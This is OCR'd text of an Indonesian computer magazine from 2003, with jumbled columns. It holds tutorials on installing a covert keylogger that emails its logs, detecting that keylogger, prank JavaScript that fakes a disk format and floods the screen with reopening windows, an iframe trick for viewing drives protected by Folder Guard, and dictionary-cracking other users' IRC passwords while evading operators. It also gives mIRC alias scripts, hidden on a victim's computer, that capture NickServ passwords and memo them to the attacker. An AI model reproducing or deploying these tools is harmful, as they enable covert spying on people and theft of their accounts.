mengetahui aktivitas pada sebuah komputer. Happy Chandraleka untuk membuka wawasan anda
(hchandraleka@yahoo.com) membahas PC Acme Net sebagai bahwa ada satu perangkat sema-
cam ini. Selanjutnya mendorong
salah satu keylogger.

PC Acme Net memonitor aktivitas komputer anda.

KEYLOGGERS.COM DOWNLOAD & INSTAL MEMBUKA CONTROL CENTER


1 Dengan sembarang browser,
kunjungi www.keyloggers.com.
2 Klik “Download” di bagian
bawah. Paket programnya
3 Masuklah ke Control Center
melalui Start → Programs →
Akan terdapat beberapa jenis cukup ringkas sekitar 591 KB PC Acme → Control Center.
keylogger buatan Raytown dalam bentuk zip. Kemudian Inilah tampilan Control Center
Corp. Pilih PC Acme Net. Atau ekstrak file zip tersebut dan yang berfungsi mengatur
dapatkan dari CD NeoTek instal dengan mengklik ganda konfigurasi keylogger.
bulan ini. pcacme.exe. Lanjutkan proses
instalasi sampai selesai.

HASIL MONITORING BUKA KONEKSI KE INTERNET MENGIRIM FILE LOG KE EMAIL


7 Proses decoding akan berlang-
sung beberapa lama, bergan-
8 Bukalah koneksi ke Internet
untuk melakukan pengujian fitur
9 Program ini juga dapat diatur
agar mengirim file log ke alamat
tung besarnya file log. Setelah Sender Options pada program email tertentu. Pilih tab Sender
selesai akan tampil kotak dialog. PC Acme Net. Isikan data pada Options. Cek “Enable Sender”
Klik saja tombol OK dan file log User Name, Password, dan dan “Email.” Tekan “Add.” Leng-
yang telah didekrip akan tampil Phone number, kemudian klik kapi account parameter-nya.
dengan browser secara “Connect.” Anda bisa juga melakukan
otomatis. pengetesan terlebih dahulu.

24 NeoTek Februari 2003


NeoStyle

pembaca untuk waspada, terlebih lagi sebuah file log yang terenkripsi. Nanti-
bila melakukan hal yang berkaitan nya file log tersebut dapat dilihat dan
dengan keamanan data pribadi anda bahkan dapat dikirimkan ke alamat
pada komputer yang dipakai oleh email tertentu atau ke komputer lain
orang banyak. Anda tentu tidak ingin dalam suatu jaringan.
data password, kartu kredit, atau data
personal lain diketahui orang. Laku-
kan hal tersebut pada komputer
pribadi saja.
Program PC Acme Net ini mencakup
fitur yang cukup lengkap. Program ini
akan bekerja di belakang layar untuk
memonitor ketukan pada keyboard,
operasi file, alamat-alamat situs yang • Keylogger PC Acme Net bekerja di
dikunjungi user, dll. Data-data yang belakang layar, memantau semua aktivitas
terkumpul itu akan terekam dalam yang berkaitan dengan pengoperasian
sebuah komputer.

MENGAKTIFKAN FITUR PENGUJIAN MELIHAT FILE LOG


4 Pilih tab “General Options.” Te-
kan “Start logger” untuk meng-
5 Coba jalankan aplikasi Word.
Ketikkan sembarang tulisan. PC
6 Dari menu Start → Programs
→ PC Acme, pilih View Log.
aktifkan Logger Status. Pastikan Acme Net akan merekam ke- Beri tanda cek pada “Log file
juga anda memberi tanda cek tukan pada keyboard, pene- from current computer.” Lanjut-
pada “Run logger at system kanan tombol kiri dan kanan kan dengan menekan tombol
startup.” Tekan tombol “Apply,” mouse, alamat situs yang di- “Decode” untuk mendekripsi
kemudian “Exit.” kunjungi dan program-program file log.
yang dijalankan.

LIHAT DI OUTLOOK EXPRESS MENYIMPAN FILE LOG WARNING


10 Jalankan Outlook Express. Hasil
monitoring dikirimkan oleh PC
11 File log dapat disimpan untuk
dibuka lain waktu. Masuklah ke
12 Program PC Acme Net yang di-
paparkan disini belum teregis-
Acme Net ke email account Control Center, pilih tab “General trasi, sehingga akan muncul pe-
dengan Subject: Report. Coba Options.” Tekan tombol “Save ringatan seperti gambar di atas.
lihat juga hasil pengetesan log file as ….” Setelah tersimpan Pilih Yes untuk melanjutkan uji
pada Langkah 9. program akan mencatat data- coba program atau No untuk
data dari awal kembali. meng-uninstall. Tetapi sebaiknya
anda meregistrasi program ini.

Februari 2003 NeoTek 25


NeoStyle

KONTRA SPIONASE
eylogger merupakan pro-
K gram mata-mata yang
bekerja secara tersembu-
nyi. Tidak tampak pada tampilan
KEYLOGG E R DE NGAN kotak dialog Close Program atau
End Task. File log-nya juga ter-
sembunyi dan terenkripsi sehing-

ANTI-KEYLOGGER 2.2 ga bila tanpa bantuan program


dari luar, tentu sangat sulit untuk
mengetahui adanya program
keylogger yang sedang aktif pada
komputer kita yang dipasang oleh
Aktivitas berkomputer anda “dimata-matai” dengan keylogger? orang lain.
Tidak usah khawatir, Happy Chandraleka (hchandraleka@ Pembahasan ini merupakan rang-
yahoo.com) menguraikan cara mengatasinya dengan program kaian dari bahasan sebelumnya. Di
sini anda akan mempelajari cara
Anti-keylogger 2.2.

Jangan mau menjadi korban keylogger.

ANTIKEYLOGGERS.COM INSTALASI CATATAN


1 Jalankan browser yang ada
dan ketikkan alamat
2 Proses download selesai. Klik
ganda file zip-nya. Anda dapat
3 Program ini merupakan versi
tidak terdaftar (trial) sehingga
www.anti-keyloggers.com. langsung melakukan instalasi hanya bisa mendeteksi saja,
Download program Anti- dengan menekan tombol tetapi tidak dapat menonak-
Keylogger versi 2.2 yang ber- “Install” pada toolbar Winzip. tifkan keylogger yang sedang
ukuran sekitar 1,16 Mb atau Lanjutkan proses instalasi bekerja pada komputer anda.
dapatkan dari CD NeoTek sampai selesai.
bulan ini.

PROSES SCANNING TERDETEKSI! SILUMAN


7 Proses scanning akan berjalan
beberapa menit. Anti-Keylogger
8 Proses scanning selesai dan pro-
gram keylogger PC Acme Net
9 File log yang terdeteksi ini tidak
dapat dilihat dengan Windows
ini akan mencari program key- yang sedang aktif terdeteksi oleh Explorer atau dengan fitur Find
logger yang sedang aktif pada Anti-Keylogger ini. File log yang Files or Folders bawaan dari
komputer anda. Pointer mouse terdeteksi berada di folder Windows. Di contoh ini file log-
akan terkunci pada bidang form C:\Windows\System. Nama file nya bernama iifhahia.hiv. Nama
Scanning. bisa bervariasi, tetapi dengan file mungkin berbeda di kompu-
ekstensi .hiv. ter anda.

26 NeoTek Februari 2003


NeoStyle

mendeteksi keberadaan program key-


logger yang terpasang pada komputer
anda.
Perangkat yang digunakan adalah
program Anti-keylogger versi 2.2,
produk dari Raytown Corp. Program
yang diujicobakan di sini adalah versi
demo (unregistered), sehingga tidak
disediakan fitur untuk menonaktifkan
keylogger. Anda harus melakukan re-
gistrasi terlebih dahulu. Meski demi- • Anti-keylogger
kian versi demo ini dapat dimanfaat- mendeteksi semua
kan untuk mendeteksi keberadaan ketukan yang
keylogger pada komputer anda. Seti- dianggap
daknya dapat membantu anda untuk “unauthorized.” Hasil
bersikap waspada. pemantauan direkam
pada sebuah file log.

MENGAKTIFKAN KEYLOGGER MENJALANKAN MEMULAI SCANNING


4 Masuklah ke Control Center
dari PC Acme Net yang telah
5 ANTIKEYLOGGER
Jalankan Anti-keylogger yang
6 Tekan “Scan” untuk melakukan
scanning. Akan muncul peri-
diinstal pada bahasan sebe- telah di-install pada langkah 2. ngatan. Anda harus menutup
lumnya. Pada bagian General Pilih menu Start → Programs aplikasi lain sebelum melaku-
Options tekan tombol “Start → Anti-keylogger. Masukkan kan scanning. Klik OK untuk
logger” untuk mengaktifkan password seperti yang anda isi melakukan scanning atau
keylogger. Klik “Exit” untuk pada proses instalasi. Cancel untuk membatalkannya.
keluar.

MENGHAPUS FILE LOG LIHAT DAN HAPUS BACA HELP-NYA


10 File itu berisi data rekaman ak-
tifvtas anda. Perlu dihapus. Ja-
11 Ketik “dir *.hiv” untuk melihat
keberadaan file log ini. Untuk
12 Untuk mengetahui informasi
lebih lanjut tentang program ini,
lankan MS-DOS prompt dari menghapusnya, ketik “del *.hiv.” ada baiknya anda membaca file
menu Start → Programs. Akan Lanjutkan dengan menekan Help program Anti-keylogger ini.
tampil jendela MS-DOS dengan Enter. Ketik “Exit” dan tekan
direktori aktif C:\Windows. Ke- Enter untuk keluar dari MS-DOS
tik “cd system” untuk masuk ke Prompt.
folder System. Tekan Enter.

Februari 2003 NeoTek 27


NeoStyle

Godain Kita Dong!


dengan Fake JavaScript
Untuk melengkapi tutorial JavaScript yang sudah cukup lama dimuat di NeoTek,
MA Rody Candera (odyxb@melva.org) membahas skrip-skrip iseng yang dapat dibuat
dengan JavaScript. Skrip iseng sebenarnya tinggal selangkah lagi ke ‘skrip curang’ atau ‘skrip jahat.’

‘Memformat’ hard disk


Masukkan Fake JavaScript seperti di bawah ini pada tag
<head>
<script language="JavaScript">
<!--
window.onerror=null;
var down;var min1,sec1;var cmin1,csec1,cmin2,csec2;
function Minutes(data) {
for(var i=0;i<data.length;i++)
if(data.substring(i,i+1)==":")
break;
ernah dengar istilah Fake JavaScript? JavaScript,
P seperti kita ketahui, digunakan untuk mendukung
HTML untuk menghadirkan halaman Web atau
}
return(data.substring(0,i));

function Seconds(data) {
homepage menjadi dinamis. Hampir seluruh halaman Web for(var i=0;i<data.length;i++)
if(data.substring(i,i+1)==":")
yang kita jumpai menggunakan JavaScript. break;
Bagi programmer yang memahami dan menguasai Java- return(data.substring(i+1,data.length));
}
Script dengan baik, membuat JavaScript makin menarik function Down() {
untuk disimak. Fake JavaScript contohnya. Dari namanya cmin2=1*Minutes(document.sw.disp1.value);
sedikit berbau Hack. Hanya baunya saja tetapi demikian csec2=0+Seconds(document.sw.disp2.value);
ditujukan untuk hack. Fake JavaScript lebih menjurus ke- DownRepeat();
pada humor, dimana user dibuat cemas terhadap apa yang }
function DownRepeat() {
terjadi pada komputernya jika halaman Web atau home- csec2--;
page yang dibuka ternyata menggunakan Fake JavaScript. if(csec2==-1) {
csec2=59; cmin2--;
Artikel ini merupakan pengalaman penulis ketika mem- }
buka sebuah halaman Web di mana ada pemberitahuan window.setTimeout('fakeformat(-1)',200);
jika sedang terjadi proses format hard disk di komputer }
lokal, status bar browser menunjukkan aktivitas tersebut function D() {
cmin2=1*Minutes(document.sw.disp1.value);
seakan-akan benar-benar terjadi. Setelah penulis mencari csec2=0+Seconds(document.sw.disp2.value);
tahu hal tersebut, ternyata sesungguhnya proses format DRepeat();
tersebut tidak terjadi. Itu hanya sebuah lelucon. }
function DRepeat() {
Mungkin lelucon tersebut mengajak kita untuk sedikit csec2--;
bersantai agar kita jangan terlalu larut dalam keseriusan if(csec2==-1) {
tinggi saat berselancar di dunia maya. csec2=59; cmin2--;
}
Di sini tidak dibahas bagaimana membuat Fake JavaScript, self.status="Document: Done";
tetapi mengulas JavaScript yang seakan-akan dapat mem- }
function faketake(percent1){
format hard disk. Setelah mempelajari artikel ini, anda if(percent1 < 100){
dapat menggunakannya untuk “menggoda” peselancar percent1++;
yang mengakses halaman Web anda. window.status="Upload of drive C:\\ in progress: "+percent1+"%
complete";
Untuk menggunakan JavaScript yang dikatakan di atas, fid1=window.setTimeout("faketake("+percent1+")",200);
yang pertama perlu dilakukan adalah membuat skripnya. }else{
Pada artikel ini, disertakan kode Fake JavaScript yang telah window.status="Upload of hard drive complete.. Now
dikatakan di atas. Mari kita gunakan halaman Web anda. deleting...";Down();}}
function fakeformat(percent){
Buatlah terlebih dahulu halaman Web dengan menggu- if(percent < 100){
nakan HTML. Anda dapat menggunakan Notepad yang percent++;
window.status="Format of drive C:\\ in progress: "+percent+"%
merupakan software yang built-in di Windows sebagai complete";
editor untuk membuatnya. Yang terpenting komputer fid=window.setTimeout("fakeformat("+percent+")",360); // 900
kita anda mendukung JavaScript atau browser yang anda }else{
gunakan adalah Microsoft IE 4.0 ke atas. window.status="Format of hard drive complete...";D();}}

28 NeoTek Februari 2003


NeoStyle

window.setTimeout('faketake(-1)',200);

function go()
{
var yo=this.location;
window.open(yo);
}
// -->
</script>

Jika layar browser tersebut ditutup, maka secara otomatis


akan muncul kembali terus begitu jika kita berusaha
untuk menutupnya. Bagaimana untuk menutup secara
tuntas? Wah, itu urusan anda!

Fake Crash
ada pembahasan sebelumnya telah dikemukakan
P mengenai Fake JavaScript yang seakan-akan
benar-benar memformat hardisk. Artikel kedua
Selanjutnya masukkan skrip di bawah ini pada tag <body> ini membahas mengenai Fake JavaScript yang lain yaitu
<form name='sw'>
Crash Browser.
<input type="hidden" name="disp1" value="0:05"> Crash Browser, maksudnya adalah memunculkan browser
<input type="hidden" name="disp2" value="0:05"> yang tanpa diaba-aba muncul begitu saja dengan jumlah
</form>
yang banyak ketika kita meng-upload halaman Web ter-
sebut. Dalam waktu yang tidak lama, kita melihat begitu
banyak browser yang muncul tanpa bisa dihentikan yang
mungkin saja dapat membuat komputer kita menjadi crash.
Bagaimana kita memindahkan skrip tersebut ke dalam
halaman Web kita? Pertama kita harus membuat lebih
dahulu skripnya.
<script laguage="javascript">
window.open('http://www.wadah-online.com=10000');
window.open('http://www.odyxboy.i-p.com=10000');
window.open('http://www.wadah-online.com=10000&item=3');
window.open('http://www.odyxboy.i-p.com=5000&item=4');
window.open('http://www.wadah-online.com=5000&item=4');
window.open('http://www.odyxboy.i-p.com=10000&item=3');
window.open('http:/www.wadah-online.com=5000');
window.open('http://www.odyxboy.i-p.com=5000');
window.open('http://www.wadah-online.com=5000&item=3');
window.open('http://www.odyxboy.i-p.com=5000&item=3');
window.open('http://www.wadah-online.com=5000&item=4');
window.open('http://www.odyxboy.i-p.com=5000&item=4');
window.open('http://www.wadah-online.com');
</script>
Tambahkan onload=”go()” ke dalam tag <body> agar
ketika halaman Web di-upload pertama kali, Fake Java- Pindahkan script tersebut pada tag <bbody>
Script langsung dijalankan.

Selanjutnya, SAVE pekerjaan anda tersebut dengan file


ekstension *.html misal formathdd.html di mana anda suka.
Selesai sudah, tinggal anda jalankan hasil pekerjaan
tersebut dan lihat hasilnya.

Februari 2003 NeoTek 29


NeoStyle

Selanjutnya simpan dengan file ekstension *.html misal-


nya crash.html. Jalankan hasil pekerjaan anda tersebut
dan rasakan hasilnya.

• Browser anda crash?


Jangan kaget dulu,
jangan-jangan yang
terjadi sebenarnya ‘Fake
Crash’ akibat ulah sckip
iseng JavaScript.

‘Mengintip’ isi hard disk


ada pembahasan sebelumnya telas diulas mengenai
P Fake JavaScript. Pada artikel ini yang akan diulas
adalah mengenai Fake HTML yang dapat meng-
intip isi hardisk pada komputer lokal atau komputer yang
mengupload halaman web yang menggunakan fake HTML.
Mengintip di sini maksudnya adalah melihat daripada isi
hardisk dimana komputer yang digunakan ternyata
menggunakan software Folder Guard untuk melindungi
isi hardisk dari tangan jahil.
Pengalaman penulis ketika menggunakan internet pada
sebuah warnet yang dimana ternyata penulis tidak dapat
mengakses file atau data yang ada di drive pada hardisk Simpan pekerjaan anda dengan file ekstensionnya *.html
karena telah diproteksi dengan menggunakan Folder → fake.html dan setelah itu coba jalankan untuk melihat
Guard. Setelah penulis menggunakan trik Fake HTML, hasilnya. Hasilnya kurang lebih seperti pada gambar di
barulah dapat terlihat file-file yang ada di hard disk. halaman berikut.
Untuk mempercantik tampilan halaman Web, anda dapat
berkreasi sendiri agar menarik perhatian orang yang
mengupload halaman web tersebut. Dapat ditambahkan
langsung dengan kata-kata agar orang yang melihat
langsung tahu sedang melihat isi folder yang mana, dan
juga menambah <iframe> untuk folder yang berbeda.
Dari gambar diatas akan didapat hasil sebagai berikut:

Fake HTML ini sebenarnya menggunakan daripada tag


<iframe> jadi bukan menggunakan script khusus, dan
caranya sangat gampang sekali. Anda hanya diminta
untuk telah mengerti dan dapat menggunakan HTML.
Buatlah halaman web anda cukup dengan menggunakan
NOTEPAD, buat sepertia biasa aturan dasar HTML.
Setelah itu barulah kita gunakan tag <iframe> yang
ditambahkan pada tag <body>
Keterangan:
<iframe src="file:\\\C|\" width=200 height=150></iframe>

• src="file:\\\C:|" è menentukan bagian isi hardisk


yang akan diperlihatkan, dapat juga ditentukan
langsung ke folder tertentu.
contoh: src="file:\\\C:\My Documents\"
• width=200 → menentukan lebar frame.
• Height=250 → menentukan panjang frame.

30 NeoTek Februari 2003


NeoStyle

I RC PASSWO R D C R AC K I N G

Nick & Channel I R C


Dengan menggunakan Wicked IRC Password Cracker, Eryanto Sitorus (ery@postmaster.co.uk)
menguraikan cara meng-crack kata sandi nick dan channel di IRC.
Uraian disertai dengan petunjuk langkah per langkah yang mudah diikuti.

ASIH TENTANG PASSWORD CRACKING. Kali ini saya


M akan membahas teknik atau cara meng-crack kata
sandi (password) nick dan channel IRC orang
lain. Namun sebelum itu saya ingin menjelaskan terlebih
dahulu secara singkat pengertian nick dan channel, ter-
masuk fungsi dan kegunaannya.
Di IRC, khususnya di server-server IRC yang sudah beken
dan tekenal seperti: DALnet, EFnet, atau UnderNet, nick
adalah suatu keharusan yang wajib dimiliki oleh setiap
orang (peserta). Tanpa nick maka jangan harap anda bisa
masuk ke dalam server-server IRC tersebut.
Nick dan Channel
Apakah guna nick? Gunanya tentu saja agar orang lain
bisa mengenali dan memanggil anda dengan suatu sebut-
an yang jelas. Sekedar informasi, anda bebas memilih
sembarang nick. Bisa berdasarkan nama kecil (panggilan)
anda sendiri, nama orang lain, nama artis idola, atau bisa
juga berdasarkan nama binatang kesayangan anda. Sepan-
jang nama (nick) tersebut belum dimiliki atau digunakan
orang lain, maka tidak ada alasan bagi anda untuk tidak
bisa menggunakannya. Lalu fungsinya? Apa cuma
sekedar nama panggilan doang? Tentu saja tidak! karena
justru di sinilah letak pentingnya sebuah nick di IRC.
Setelah anda memilih sebuah nick, dan kemudian mere- • Level jabatan di IRC
gistrasi atau mendaftarkannya ke NickServ, maka secara
tidak langsung saat itu juga anda resmi menyandang pang- Keterangan gambar:
kat/predikat sebagai bos, pemilik, atau founder sebuah Founder adalah pemilik tunggal suatu channel di IRC.
channel, jika kelak anda memutuskan untuk membuat- Founder berhak untuk mengubah kata sandi channel, des-
nya. Dan dengan pangkat itu pulalah kelak anda berhak kripsi, setting, dan topik channel, mengangkat satu atau
mengangkat peserta lain untuk menjadi OP (channel oper- beberapa peserta lain untuk menjadi channel operator,
ator), termasuk mengangkat seorang rekan yang anda dan men-drop atau menghapus registrasi channel.
percayai untuk menjadi wakil (co-founder) di channel-
channel yang anda bangun. CO Founder adalah seseorang yang dipercaya untuk men-
jadi wakil founder. Untuk mengangkat seseorang menjadi
Singkat kata, nick yang telah diregistrasi secara sah, ada- wakil (CO-Founder), founder harus memberitahu kata
lah syarat awal untuk menjadi founder atau channel oper- sandi nick-nya. Dan setelah nick tersebut diidentifikasi
ator. Sedangkan channel (kanal), kita bisa artikan atau maka secara otomatis CO Founder akan memiliki hak
anggap sebagai pangkalan, atau tongkrongan untuk tem- yang sama seperti founder untuk mengatur channel,
pat ngumpul, ngerumpi, atau berdiskusi secara real-time, mengangkat peserta lain untuk menjadi SOP/AOP,
dan tentu saja sebagai suatu komunitas yang diakui seca- mengubah setting dan kata sandi channel, mengganti
ra resmi oleh Channel Services (ChanServ). Dan jangan topik channel, menghapus account peserta dari daftar
lupa, semakin banyak jumlah anggota atau peserta chat SOP/AOP, dan lain sebagainya.
yang ikut bergabung masuk ke dalam channel anda, maka
nilai prestisenya pun akan semakin tinggi pula. Dengan SOP Jika dilihat dari struktur, SOP adalah orang kedua se-
kata lain, channel berikut nick anda yang terdaftar sebagai telah founder atau CO Founder. Seorang SOP tidak me-
pemilik (founder) dari channel tersebut, termasuk nick miliki hak untuk mengubah setting channel atau kata
orang lain yang anda angkat sebagai co-founder dan chan- sandi. SOP hanya bisa mengangkat peserta lain untuk
nel operator, akan semakin bernilai di mata peserta chat menjadi channel operator sebagai AOP, atau menghapus-
lain. Struktur kepangkatan atau jabatan di IRC, bisa kita nya. Dalam keadaan tertentu, SOP kadang juga bisa atau
gambarkan sebagai berikut. dimungkinkan mengganti topik channel.

Februari 2003 NeoTek 31


NeoStyle

AOP adalah channel operator paling rendah (bawahan). Di channel IRC. Bahkan saya sendiri, setelah melakukan uji
dalam channel, seorang AOP hanya bisa mengeluarkan coba, berhasil meng-crack sebuah kata sandi nick dan
(kick) peserta lain dari dalam channel jika dianggap nakal. channel musuh lama saya di server IRC DALnet. Proses
AOP juga boleh memberi status +V (voice). Tapi AOP itulah yang saya jadikan gambar untuk melengkapi
tidak berhak mengangkat peserta lain untuk menjadi tulisan ini.
channel operator, apalagi sampai meng-kick atau Agar anda tidak memperoleh pesan kesalahan seperti
menghapus account SOP. yang terlihat pada gambar di bawah ini saat menginstal
User Biasa Para peserta (anggota) yang ikut meramaikan Wicked IRC Password Cracker, pastikan bahwa di dalam
channel. User biasa tidak memiliki hak sedikit pun untuk direktori C:\WINDOWS\SYSTEM anda sudah ada file-
ikut campur dalam mengelola channel. file berikut:
Nah, setelah anda memahami arti, fungsi, dan kegunaan- • MSVCRT40.DLL
nya, sekarang saya akan membahas cara meng-crack kata • OLEPRO32.DLL
sandi (password) kedua komponen penting IRC tersebut. • VB40032.DLL
Adapun tool atau program yang akan kita gunakan untuk Jika anda tidak berhasil menemukan ketiga buah file ter-
melakukan tugas tersebut, adalah Wicked IRC Password sebut di atas dalam folder C:\WINDOWS\SYSTEM\,
Cracker. Tool ini merupakan skrip addon IRC yang dibuat silahkan mendownloadnya di
oleh seseorang dengan inisial Beefcake. Sayangnya alamat
Web pemilik program yang dicantumkan dalam file READ- www16.brinkster.com/erytricksy/Software/vb40032.zip
ME.TXT sudah tidak aktif lagi. Jadi, jika anda tertarik meng- atau anda bisa me-request-nya ke alamat email saya.
gunakan Wicked IRC Password Cracker, silakan menginstal-
nya langsung dari CD NeoTek nomor ini. Atau anda juga
bisa men-download-nya di
www16.brinkster.com/erytricksy/Software/irc_cracker.zip
Meskipun cara kerja program ini bisa dikatakan sangat
simpel dan sederhana, tetapi menurut informasi pembuat-
nya, program yang dibuat dari bahasa skrip IRC ini per-
nah sukses meng-crack beberapa kata sandi nick dan
• Pesan kesalahan saat menginstal Wicked Password Cracker.

Menginstal Wicked IRC Password Cracker

MULAI MENGINSTAL MENENTUKAN DIREKTORI CONTROL CENTER


1 Pertama, ekstrak file irc_crack.
zip, lalu jalankan file SETUP.
2 Tentukan direktori untuk mele-
takkan file instalasi. Klik Next
3 Proses instalasi selesai! Klik
Finish untuk menutup pesan
EXE. Kemudian klik Next. 3 kali untuk melanjutkan. Setup Complete.

MENAMBAHKAN SKRIP Addon (load) skrip yang anda instal ke mIRC SETELAH PROSES ADDON
4 client anda. Caranya, jalankan program mIRC, lalu dari jendela status
mIRC, ketik /LOAD -RS C:\WICKED\CRACKER\CRACK.MRC. Ketika anda
5 Jika addon sukses (skrip ber-
hasil di-load), akan muncul
mengetik perintah tersebut, program mIRC akan meminta konfirmasi. pesan di atas.

32 NeoTek Februari 2003


NeoStyle

Meng-crack kata sandi nick


Karena yang akan di-crack adalah kata sandi atau password nick IRC orang lain melalui program mIRC, maka anda
harus menghubungkan mIRC anda terlebih dahulu ke dalam salah satu server IRC (saya sarankan anda masuk ke
server IRC DALnet). Langkah-langkahnya adalah sebagai berikut:

MENENTUKAN NICK DIREKTORI FILE DIC MENENTUKAN URUTAN (LINE)


1 Dari jendela status mIRC, klik
tombol kanan mouse anda.
2 Ulangi proses pada Langkah 1:
Password Cracker → Nick
3 Ulangi kembali Langkah 1,
Password Cracker → Nick
Lalu sorot menu Password Cracker → Pro Setup → Set Cracker → Pro Setup → Set
Cracker → Nick Cracker → Pro Dic untuk men-set Dic (dict- Line untuk men-set dari mulai
Setup → Set Nick. Ketikkan ionary) kata sandi nick. Lalu urutan keberapa kata sandi
nick yang akan anda crack. tentukan lokasi atau tempat akan dijalankan.
file dic.txt.

MENENTUKAN TIMER MEMULAI CRACKING MENENTUKAN URUTAN (LINE)


4 Sekali lagi, ulang Langkah1, de-
ngan diakhiri Set Speed untuk
5 Setelah semua selesai di-set,
anda dapat mulai meng-crack.
6 Jika nasib anda sedang baik, bu-
kan tidak mungkin anda men-
mengatur timer atau waktu pro- Ulangi Langkah 1, kemudian dapat pesan “Password accept-
ses cracking. Agar IRC Operat- sorot menu Password Cracker ed for…” seperti gambar di
or (IRCop) tidak mengendus → Nick Cracker → Start untuk atas. Oleh karena itu, anda agar
adanya percobaan password memulai proses cracking. Pa- tidak pesimis. Jika anda berusa-
cracking, sebaiknya timer di set da awal-awal anda mungkin ha, niscaya anda akan berhasil!
sebanyak 10-25 detik. Bila an- menerima pesan “incorrect”
da memasukkan angka kurang dari NickServ, bahwa kata san-
dari 3-5 detik, maka IRCop akan di yang ter-entry secara oto-
memberi warning kepada matis itu salah, seperti pada
anda, seperti gambar di atas. gambar di atas.

Meng-crack kata sandi channel


Untuk meng-crack kata sandi channel, langkah-langkah-
nya persis sama seperti meng-crack kata sandi nick.
Pertama klik tombol kanan mouse di dalam jendela Status
mIRC, lalu sorot menu Password Cracker → Chan
Cracker → Pro Setup → Set Chan.
Setelah anda mengetik nama channel yang akan anda
crack, ulangi kembali langkah tersebut, lalu pilih atau
sorot menu Password Cracker → Chan Cracker → Pro
Setup → Set Dic, demikian seterusnya sampai tahap
terakhir (Password Cracker → Chan Cracker → Start.)
Sekali lagi saya ingatkan, janganlah lekas menyerah jika
upaya pertama anda menemui kegagalan.

Februari 2003 NeoTek 33


NeoStyle

I RC PASSWO R D C R AC K I N G
Skrip Nick Password Cracking
Anda dapat meng-crack kata sandi nick seseorang pada IRC dengan menggunakan skrip yang ditanamkan
di komputer orang lain. MA Rody Candera (odyxb@melva.org) memberiikan skrip itu
disertai dengan petunjuk penggunaanya langkah per langkah.

RTIKEL INI SEBENARNYA DIBUAT KARENA diilhami


A artikel Eryanto Sitorus Nguping di IRC (NeoTek
Vol. III, No. 2). Artikel ini tidak berjudul mengu-
/nickserv {
/set %y1 $$1
if ( %y1 == identify ) {
/set %y2 $$2
ping karena memang tidak melakukan tindakan menguping, /.msg nickserv@services.dal.net $1-
tetapi memaparkan cara atau teknik mendapatkan kata /.timer 1 480 /.memoserv send [Nick] Nick: $me Password:
sandi (password) nick seseorang yang telah diregisterkan. %y2
/.timer 1 485 /.clear
Untuk mendapatkan kata sandi tersebut dibutuhkan skrip }
mIRC, umumnya skrip itu ditanamkan di Tools Menu else /.msg nickserv@services.dal.net $1-
/.unset %y1
Remote (perhatikan skrip mIRC tulisan Eryanto Sitorus). /.unset %y2
Skrip yang akan dipaparkan berikut berbeda tempat me- }
nanamkannya, skripnya ditanam di Tools Menu Aliases.
Skrip ini sudah diujikan beberapa kali dengan hasil selu- Perhatikan skrip tersebut, ganti [Nick] dengan nick anda
ruhnya sukses, anda dapat mencobanya nanti. Hanya per- yang telah diregisterkan agar password terhadap nick
masalahannya adalah bagaimana menanamkannya di orangl ain yang telah diregisterkan dikirimkan sebagai
komputer orang lain yang jauh jaraknya dari tempat kita. memo ke nick anda. Tanamkan saja kedua-duanya sebagai
Penulis sendiri mengakui belum berhasil menemukan langkah antisipasi dan posisikan script tersebut dengan
cara tersebut, mungkin saudara Eryanto Sitorus nantinya aman agar tidak terlihat oleh orang lain, dapat dengan
dapat membantu kita semua? cara memposisikan script tersebut lebih ke bawah dari
script yang telah ada sebelumnya di dalam Aliases.
Ada dua skrip yang nantinya akan ditanamkan ke dalam
Aliases, skrip pertama dapat dilihat di bawah ini. Skrip ini
digunakan untuk merespon event dimana seseorang yang
akan melakukan identify nicknya dengan command
/nickserv identify [pass] dan mengirimkan password dari
nick tersebut ke dalam bentuk memo.
Skrip yang kedua berfungsi untuk merespon seseorang
yang melakukan identify nick-nya dengan command
/identify [pass] dan mengirimkan password tersebut
dalam bentuk memo

/identify {
/set %y1 $$1
/.msg nickserv@services.dal.net identify $1-
/.timer 1 480 /.memoserv send [Nick] Nick: $me Password: %y1
/.timer 1 485 /.clear
/.unset %y1
}

Mari kita mencoba skrip tersebut.

34 NeoTek Februari 2003


NeoStyle

Buka mIRC anda tanpa mela- Klik Tools Menu → pilih dan Pindahkan skrip yang diperli-
1 kukan koneksi ke server dalnet
karena kita akan memindah-
2 klik Aliases... Alt + A tunggu
sampai Editor mIRC untuk
3 hatkan di atas ke dalam Editor
mIRC Aliases, jangan lupa
kan skrip tersebut terlebih Aliases muncul. mengganti [Nick] dengan nick
dahulu. anda sendiri yang telah
diregisterkan.

Agar skrip tersebut tidak dili- Masih di Editor mIRC, posisi- Selesai sudah menanamkan
4 hat orang lain yang kebetulan
melihat-lihat Editor mIRC,
5 kan kembali scroolbar ke atas
dan klik File → Save → OK.
6 skrip tersebut, dan tinggal me-
nunggu korban saja. Tetapi si-
tetapi biasanya orang lebih lakan mencoba apakah peker-
suka melihat Editor mIRC Re- jaan anda itu berhasil. Masuk-
mote untuk menghindari hal- kan nick yang akan dijadikan
hal yang dianggap menggang- kelinci percobaan dengan ca-
gu privasinya, seperti yang tatan nick tersebut harus nick
sering dilakukan penulis sen- yang teregister karena hanya
diri, turunkan skrip tersebut ke nick yang teregister yang me-
bawah sehingga Editor mIRC miliki password. Selanjutnya
Aliases muncul scroll bar lakukan connection ke server
dalnet.

Setelah koneksi berjalan, nick Tunggu untuk beberapa saat Sekarang coba buka mIRC satu
7 teregister yang anda pakai di-
minta untuk memasukkan pass-
8 sekitar 8 menit, perhatikan
Status. Muncul pesan bahwa
9 lagi, gunakan nick yang dipakai
di dalam skrip. Apakah kita te-
wordnya sebagai bukti kalau ada pengiriman memo ke nick lah menerima memo dari nick
user tersebut adalah pemilik tertentu, tetapi itu hanya seben- korban yang berisi password
nick tersebut. tar dapat dilihat karena 5 detik nick tersebut.
ke depan semua tulisan di Dari gambar kedua di atas ter-
Status hilang (seperti melaku- lihat bahwa anda telah mene-
kan command Clear). Itu mem- rima memo dari nick korban,
buktikan pekerjaan anda bacalah apa isi memo terse-
berhasil. but. Ternyata nick odyxb pass-
wordnya lontongsayur.

35 NeoTek Februari 2003


NeoStyle

I RC PASSWO R D C R AC K I N G
Bongkar Paksa Nick &
Channel Password
Banyak cara untuk mendapatkan password nick dan channel orang . Putut Indrayana (matrik7@yahoo.com)
menyajikan salah satu cara yaitu dengan menjalankan skrip yang menjalankan proses brute force.
Skrip pada artikel ini telah diuji coba oleh MA Rody Candera (odyxb@melva.org).

